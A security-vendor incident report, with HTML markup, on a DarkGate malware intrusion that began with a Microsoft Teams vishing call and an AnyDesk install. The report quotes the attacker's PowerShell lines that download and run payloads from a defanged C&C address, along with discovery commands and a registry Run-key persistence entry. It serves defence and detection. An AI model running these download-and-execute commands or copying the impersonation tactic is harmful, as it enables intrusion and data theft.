Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/l\/darkgate-malware.html\"><br \/>\n<meta property=\"og:title\" content=\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion \"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/DarkGate-thumbnail.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion \"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/DarkGate-thumbnail.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.553037639615\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"646460393\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.7715736040609\">\n<div class=\"article-details\" role=\"heading\" readability=\"39.086294416244\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">In this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool, triggering DarkGate malware activities and an attempted C&C connection.<\/p>\n<p class=\"article-details__author-by\">By: Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta <time class=\"article-details__date\">December 13, 2024<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"36.623649078195\">\n<div readability=\"18.80673871583\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">The Trend Micro Managed Detection and Response (MDR) team analyzed an incident wherein an attacker used social engineering via a Microsoft Teams call to impersonate a user\u2019s client and gain remote access to their system.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The attacker failed to install a Microsoft Remote Support application but successfully instructed the victim to download AnyDesk, a tool commonly used for remote access.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">After gaining access to the machine, the attacker dropped multiple suspicious files. One of the suspicious files was detected as Trojan.AutoIt.DARKGATE.D.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">A series of commands executed by Autoit3.exe led to the connection to a potential command-and-control server and the subsequent download of a malicious payload.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Persistent files and a registry entry were created on the victim’s machine, though the attack was ultimately thwarted before exfiltration occurred.<\/span><\/li>\n<\/ul>\n<p>Using Vision One, we observed a recent security incident in which a user was targeted by an attacker posing as an employee of a known client on a Microsoft Teams call. This led to the user being instructed to download the remote desktop application AnyDesk, which then facilitated the deployment of <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/c\/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html\" target=\"_blank\" rel=\"noopener\">DarkGate malware<\/a>. DarkGate, distributed via an AutoIt script, enabled remote control over the user’s machine, executed malicious commands, gathered system information, and connected to a command-and-control server. In this blog entry, we discuss how this breach was carried out in several stages, emphasizing the need for robust security measures and heightened awareness against social engineering attacks. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig01.png\" alt=\"Figure 1. Timeline of the attack\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Timeline of the attack<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"44.972067039106\">\n<div readability=\"36.173184357542\">\n<h4>Initial access<\/h4>\n<p>From this sample case, the attacker used <a href=\"https:\/\/www.trendmicro.com\/vinfo\/tmr\/?\/us\/security\/definition\/social-engineering\" target=\"_blank\" rel=\"noopener\">social engineering<\/a> to manipulate the victim to gain access and control over a computer system. The victim reported that she first received several thousands of emails, after which she received a call via Microsoft Teams from a caller claiming to be an employee of an external supplier. During the call, the victim was instructed to download Microsoft Remote Support application, however, the installation via the Microsoft Store failed. The attacker then instructed the victim to download AnyDesk via browser and manipulate the user to enter her credentials to AnyDesk. Impersonating IT support to potential victims following an email flood is a technique that has been previously disclosed in <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/05\/15\/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware\/\" target=\"_blank\" rel=\"noopener\">a Microsoft blog entry<\/a>.<\/p>\n<p>During the call, the victim was instructed to download a Microsoft Remote Support application; however, the installation via the Microsoft Store failed. The attacker then instructed the victim to download AnyDesk from its official site via browser, and manipulated the user into entering her credentials to AnyDesk. <\/p>\n<h4>Execution<\/h4>\n<p>The execution of AnyDesk.exe was observed seconds after downloading the application. The command ran is as follows:<\/p>\n<p><span class=\"blockquote\">\u201cC:\\Users\\<user>\\Downloads\\AnyDesk.exe” –local-service<\/span><\/p>\n<p>This command runs the AnyDesk remote desktop application and starts it as a local service on the system, allowing it to operate with elevated privileges or in a minimized\/automated fashion.<\/p>\n<p>A few minutes after, cmd.exe was invoked to execute rundll32.exe to load <i>SafeStore.dll<\/i>, which we assumed were dropped via AnyDesk.exe.<i><\/i><\/p>\n<blockquote><p>processCmd: “C:\\Windows\\System32\\cmd.exe”<br \/>eventSubId: 2 – TELEMETRY_PROCESS_CREATE<br \/>objectFilePath: c:\\windows\\system32\\rundll32.exe<br \/>objectCmd: rundll32.exe SafeStore.dll,epaas_request_clone<\/p><\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig02.png\" alt=\"Figure 2. Vision One\u2019s root cause analysis for the SafeStore.dll (SHA256: 1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. Vision One\u2019s root cause analysis for the SafeStore.dll (SHA256: 1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Vision One\u2019s root cause analysis (RCA) in Figure 4 shows a DLL side-loading technique where rundll32.exe was invoked to execute an exported function in Safestore.dll called <i>epaas_request_clone <\/i>(Figure 3). There are multiple functions exported by the DLL that can be used to execute the malware (Figure 4).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig03.png\" alt=\"Figure 3. The exported function epaas_request_clone\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. The exported function epaas_request_clone<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig04.png\" alt=\"Figure 4. Functions exported by the DLL\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Functions exported by the DLL<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The execution of Safestore.dll, originally named epaas_client.dll, prompts a login form for entering credentials (Figure 5). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig05.png\" alt=\"Figure 5. Login form\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Login form<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>While the suspicious form was executing, multiple malicious commands were running in the background, even if the user did not enter any credentials. The commands are as follow:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>cmd \/c systeminfo<\/b> \u2013 provides detailed information about the system’s configuration, including the operating system version, hardware specifications, memory, network adapter details, and system uptime.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>cmd \/c route print<\/b> \u2013 provided the current network routing table, showing how network traffic is directed to different destinations based on the system’s network configuration.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>cmd \/c ipconfig \/all<\/b> \u2013 provided detailed information about all network interfaces on the system, including IP addresses, subnet masks, gateways, DNS servers, and other network configuration details. <\/span><\/li>\n<\/ul>\n<p>Saving all the data gathered from the system to 123.txt may be used for system discovery (Figure 6).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig06.png\" alt=\"Figure 6. 123.txt\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. 123.txt<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<h4>DarkGate A3x script<\/h4>\n<p>The executable file <i>SystemCert.exe<\/i> (SHA256: 4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1), which we believed was dropped via AnyDesk.exe, was executed and created <i>script.a3x<\/i> and <i>Autoit3.exe<\/i> in the <i>C:\\Temp\\test\\<\/i> folder (Figure 7).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig07.png\" alt=\"Figure 7. Vision One\u2019s root cause analysis for the creation of script.a3x and Autoit3.exe\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Vision One\u2019s root cause analysis for the creation of script.a3x and Autoit3.exe<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>After the script.a3x and AutoIt3.exe files are created, the malicious script script.a3x is executed via the command cmd <i>c:\\temp\\test\\AutoIt3.exe c:\\temp\\test\\script.a3x<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig08.png\" alt=\"Figure 8. Content of decompiled script.a3x (SHA256: bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922), which was detected as Trojan.AutoIt.DARKGATE.D\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Content of decompiled script.a3x (SHA256: bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922), which was detected as Trojan.AutoIt.DARKGATE.D<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p>The encrypted AutoIt payload script.a3x decrypts itself in memory as shellcode and injects itself into remote processes. One observed example was the legitimate binary for MicrosoftEdgeUpdateCore.exe, located in C:\\Program Files (x86)\\Microsoft\\EdgeUpdate. This process is used as a proxy to load and execute the DarkGate script into memory. The execution flow then loads other types of malware into memory to carry out subsequent stages of the attack.<\/p>\n<h4>Discovery<\/h4>\n<p>Then, the following discovery commands were executed by <i>Autoit3.exe<\/i>:<\/p>\n<blockquote><p>processCmd: “c:\\temp\\test\\Autoit3.exe” c:\\temp\\test\\script.a3x<br \/>objectCmd: “c:\\windows\\system32\\cmd.exe” \/c wmic ComputerSystem get domain > C:\\ProgramData\\fcdcdfc\\kcbbbbc<\/p><\/blockquote>\n<p>This command retrieves information about the system’s domain and saves the output to the file<i> kcbbbbc<\/i> inside the folder <i>C:\\ProgramData\\fcdcdfc<\/i>.<\/p>\n<h4>Defense evasion<\/h4>\n<p>A replicated scenario of this attack shows that Autoit3.exe is looking for multiple well-known antivirus products. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig09.png\" alt=\"Figure 9. Replication of the attack where Autoit3.exe was looking for antivirus products\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Replication of the attack where Autoit3.exe was looking for antivirus products<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>It was also observed that multiple randomly named files were created on different locations as well as copies of <i>Autoit3.exe.<b> <\/b><\/i>This<b><i> <\/i><\/b>technique is being used to evade detection.<\/p>\n<h4>Command and control<\/h4>\n<p>Autoit3.exe also executed the script.a3x to inject a process into MicrosoftEdgeUpdateCore.exe, which was then observed connecting to external IP <i>179.60.149[.]194:80<\/i>, a C&C server.<\/p>\n<blockquote><p>processCmd: “c:\\temp\\test\\Autoit3.exe” c:\\temp\\test\\script.a3x<br \/>eventSubId: 2 – TELEMETRY_PROCESS_CREATE<br \/>objectFilePath: C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.35\\MicrosoftEdgeUpdateCore.exe<\/p><\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig10.png\" alt=\"Figure 10. Vision One\u2019s root cause analysis for the outbound connection to C&C server\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Vision One\u2019s root cause analysis for the outbound connection to C&C server<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>A few minutes after the connection to IP 179.60.149[.]194<b>, <\/b>a VBScript was executed via cscript.exe:<\/p>\n<p><span class=\"blockquote\">objectCmd:cscript spamfilter_v1.4331.vbs<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig11.png\" alt=\"Figure 11. Contents of spamfilter_v1.4331.vbs\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Contents of spamfilter_v1.4331.vbs<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"43\">\n<div readability=\"31\">\n<p>Based on the contents of VBScript spamfilter_v1.4331.vbs file, it will run the PowerShell command, then run the script.a3x via Autoit3.exe.<\/p>\n<h4>Final DarkGate payload<\/h4>\n<p>The said event was accompanied by the execution of a PowerShell command that dropped the DarkGate payload:<\/p>\n<p><span class=\"blockquote\">objectCmd: “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri hxxp:\/\/179.60.149[.]194:8080\/fdgjsdmt)<\/span><\/p>\n<p>The command above will attempt to download<b> <\/b><i>fdgjsdmt<b> <\/b><\/i>from<i> hxxp:\/\/179.60.149[.]194:8080<\/i> and execute it with the following content:<\/p>\n<p><span class=\"blockquote\">objectRawDataStr:ni ‘C:\/rbne\/dxqu\/’ -Type Directory -Force;cd ‘C:\/rbne\/dxqu\/’;Invoke-WebRequest -Uri “hxxp:\/\/179.60.149[.]194:8080\/dogjaafa” -OutFile ‘file.zip’;Expand-Archive -Path ‘file.zip’ -DestinationPath ‘C:\/rbne\/dxqu\/’;<\/span><\/p>\n<p>This command will create a directory at <i>C:\\rbne\\dxqu\\<\/i> if it doesn’t already exist. The <i>-Force<\/i> flag forces the creation even if the directory already exists or if it has hidden or system attributes. It will then attempt to download a file (<i>dogjaafa<\/i>) and save it as <i>file.zip<\/i>.<\/p>\n<p><i>Expand-Archive<\/i> is a PowerShell cmdlet used to extract the contents of a zip file. This command extracts the contents of the downloaded<i> file.zip<\/i> into the <i>C:\\rbne\\dxqu\\<\/i> directory. The file.zip was dropped to <i>C:\\rbne\\dxqu\\ <\/i>and contains a malicious AutoIt script.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig12.png\" alt=\"Figure 12. Vision One\u2019s root cause analysis for file.zip\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. Vision One\u2019s root cause analysis for file.zip<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>A few minutes later, an executable file, <i>StaticSrv.exe<\/i> (SHA256: faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b), dropped in the C:\\Users\\<user>\\ folder, was executed and invoked AutoIt3.exe to run script.a3x. <i>StaticSrv.exe<\/i> and <i>SystemCert.exe<\/i> exhibit the same behavior.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig13.png\" alt=\"Figure 13. Vision One\u2019s root cause analysis for the execution script.a3x via Autoit3.exe\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. Vision One\u2019s root cause analysis for the execution script.a3x via Autoit3.exe<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<h4>Post-installation activities<\/h4>\n<p>Multiple files and a registry entry were then created for persistence:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">C:\\ProgramData\\fcdcdfc\\gdhfdfd\\18-11-2024.log <i>(encrypted key logs)<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\ProgramData\\fcdcdfc\\kkfafef<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\Temp\\gggahbb<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\Temp\\hbakdef<\/span><\/li>\n<\/ul>\n<p>The following files were also created by <i>Autoit3.exe<\/i>,<b><i> <\/i><\/b>including a copy of itself, possibly for backup purposes:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">C:\\ProgramData\\fcdcdfc\\Autoit3.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\ProgramData\\fcdcdfc\\bbbckdb.a3x<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\Temp\\cdcecgg<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\Users\\<user>\\AppData\\Roaming\\EaDeKFb<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/darkgate-malware\/DarkGate-Fig14.png\" alt=\"Figure 14. Vision One\u2019s root cause analysis for the files created by Autoit3.exe\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. Vision One\u2019s root cause analysis for the files created by Autoit3.exe<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"42.962200598802\">\n<div readability=\"33.41504491018\">\n<p>The registry entry created by MicrosoftEdgeUpdateCore.exe is as follows:<\/p>\n<blockquote><p>Registry root:2<br \/>Registry key:HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<br \/>Registry value name:ddadcae<br \/>Registry value data: “C:\\ProgramData\\fcdcdfc\\Autoit3.exe” C:\\ProgramData\\fcdcdfc\\bbbckdb.a3x<br \/>Registry value type:1<\/p><\/blockquote>\n<h4>Conclusion and security recommendations<\/h4>\n<p>In this case we have studied, the attack was prevented before the attacker achieved their objective. There are no activities related to exfiltration found. DarkGate is primarily distributed through phishing emails, malvertising and SEO poisoning. However, in this case, the attacker leveraged <a href=\"https:\/\/www.trendmicro.com\/vinfo\/tmr\/?\/us\/security\/definition\/vishing\" target=\"_blank\" rel=\"noopener\">voice phishing (vishing)<\/a> to lure the victim. The vishing technique has also been documented by <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/05\/15\/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware\/\" target=\"_blank\" rel=\"noopener\">Microsoft<\/a>, in a case where the attacker utilized QuickAssist to gain access to its target to distribute ransomware. <i> <\/i><\/p>\n<p>To protect themselves from attacks like that discussed in this blog entry, organizations can apply the following best practices:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Thoroughly vet third-party technical support providers. While<\/b> legitimate third-party technical support services exist, organizations should ensure that any claims of vendor affiliation are directly verified before granting remote access to corporate systems. Cloud vetting processes should be established to evaluate and approve remote access tools, such as AnyDesk, by assessing their security compliance and the reputation of their vendors.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Whitelist approved remote access tools and block any unverified applications.<\/b> Organizations should integrate multi-factor authentication (MFA) on remote access tools to add an additional layer of protection by requiring multiple forms of verification before access is granted. This reduces the risk of malicious tools being used to gain control over internal machines.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Provide employee training to raise awareness about social engineering tactics, phishing attempts, and the dangers of unsolicited support calls or pop-ups.<\/b> Well-informed employees are less likely to fall victim to social engineering attacks, strengthening the organization\u2019s overall security posture.<\/span><\/li>\n<\/ul>\n<p>To effectively combat the evolving threat landscape, organizations must prioritize a layered security approach. Solutions like <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Apex One\u2122<\/a> with XDR offer a complete security-as-a-service (SaaS) solution, providing full access to the XDR capabilities in <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a> for detecting, responding to, and enhancing the prevention of cyberattacks. Additionally, <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/services\/managed-xdr.html\" target=\"_blank\" rel=\"noopener\">Trend Micro\u2122 Managed XDR<\/a>, included in <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/services\/service-one.html\" target=\"_blank\" rel=\"noopener\">Trend Service One\u2122<\/a>, plays a crucial role by delivering round-the-clock monitoring, defense, and detection to ensure continuous protection against emerging threats.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.153106982703\">\n<div readability=\"30.864830237028\">\n<h4>Trend Micro Vision One Threat Intelligence<\/h4>\n<p>To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.<\/p>\n<p><b>Trend Micro Vision One Intelligence Reports App [IOC Sweeping]<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>Spike in DarkGate Activity – with a new version and new infrastructure<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>A new DARKGATE campaign was observed<\/i><\/span><\/li>\n<\/ul>\n<p><b>Trend Micro Vision One Threat Insights App<\/b><\/p>\n<h4>Hunting Queries<\/h4>\n<p><b>Trend Micro Vision One Search App<\/b><\/p>\n<p>To hunt for possible malicious activities relating to DarkGate, you may use the query below. The threat hunting query below detects presence of Autoit3 and script files (.a3x) which are being created and executed. Note that this can also be triggered by normal activity.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">eventSubId: 101 – TELEMETRY_FILE_CREATE<\/span><\/li>\n<li><span class=\"rte-red-bullet\">eventSubId: 2 – TELEMETRY_PROCESS_CREATE<\/span><\/li>\n<\/ul>\n<p><b><span class=\"blockquote\">eventSubId:101 andeventSubId:2 and (objectCmd:(Autoit3.exe or *.a3x) or processCmd:(Autoit3.exe or *.a3x))<\/span><\/b><\/p>\n<p>More hunting queries are available for Vision One customers with\u202f<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" target=\"_blank\" rel=\"noopener\">Threat Insights Entitlement enabled<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"719\">\n<tbody readability=\"9\">\n<tr>\n<td width=\"435\" valign=\"bottom\"><b>SHA256<\/b><\/td>\n<td width=\"132\" valign=\"bottom\"><b>Indicator<\/b><\/td>\n<td width=\"152\" valign=\"bottom\"><b>Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"435\" valign=\"bottom\">1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a <\/td>\n<td width=\"132\" valign=\"bottom\">SafeStore.dll <\/td>\n<td width=\"152\" valign=\"bottom\">Trojan.Win64.DARKGATE.A <\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"435\" valign=\"bottom\">4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1 <\/td>\n<td width=\"132\" valign=\"bottom\">SystemCert.exe <\/td>\n<td width=\"152\" valign=\"bottom\">Trojan.Win32.DARKGATE.E <\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"435\" valign=\"bottom\">faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b <\/td>\n<td width=\"132\" valign=\"bottom\">StaticSrv.exe <\/td>\n<td width=\"152\" valign=\"bottom\">Trojan.Win32.DARKGATE.E <\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"435\" valign=\"bottom\">bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922 <\/td>\n<td width=\"132\" valign=\"bottom\">script.a3x <\/td>\n<td width=\"152\" valign=\"bottom\">Trojan.AutoIt.DARKGATE.D <\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"435\" valign=\"bottom\">e4d13af4bfc3effe4f515c2530b1b182e18ad0c0a3dacac4dd80d6edcf0b007a <\/td>\n<td width=\"132\" valign=\"bottom\">spamfilter_v1.4331.vbs <\/td>\n<td width=\"152\" valign=\"bottom\">Trojan.VBS.DARKGATE.B <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"726\">\n<tbody readability=\"1\">\n<tr>\n<td width=\"342\" valign=\"top\"><b>URL\/IP<\/b><\/td>\n<td width=\"138\" valign=\"top\"><b>Rating<\/b><\/td>\n<td width=\"246\" 